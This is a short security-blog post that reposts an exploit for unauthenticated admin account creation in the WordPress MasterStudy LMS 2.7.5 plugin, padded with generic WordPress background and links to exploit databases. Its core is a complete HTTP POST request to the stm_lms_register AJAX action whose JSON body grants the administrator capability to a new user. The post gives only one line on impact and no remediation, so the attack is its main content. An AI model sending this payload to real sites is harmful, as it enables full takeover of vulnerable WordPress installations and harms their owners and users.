Home Bug & Exploit Unauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

Unauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

353
0

WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP[4] and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes. WordPress was originally created as a blog-publishing system but has evolved to support other web content types including more traditional mailing lists and forums, media galleries, membership sites, learning management systems (LMS) and online stores. One of the most popular content management system solutions in use, WordPress is used by 42.8% of the top 10 million websites as of October 2021.

Refference list :
1. https://www.exploit-db.com/exploits/50752
2. https://packetstormsecurity.com/files/166060/WordPress-MasterStudy-LMS-2.7.5-Account-Creation.html
3. https://patchstack.com/database/vulnerability/masterstudy-lms-learning-management-system/wordpress-masterstudy-lms-plugin-2-7-5-unauthenticated-admin-account-creation-vulnerability

POC Details :
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"[email protected]","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

This security vulnerability could give attackers access to an administrator-level account

TOP 3 Website to track WordPress hacking alert

WordPress is an open source application that is very popularly used as a blog engine. WordPress is built with the Read more

Smart Product Review 1.0.4 Arbitrary File Upload on WordPress

Smart Product Review is an All in One review pack for your WooCommerce store. It lets you add customers’ reviews and Read more

Previous articleSmart Product Review 1.0.4 Arbitrary File Upload on WordPress
Next articleSQLi Injection in ATOM CMS 2.0

LEAVE A REPLY

Please enter your comment!
Please enter your name here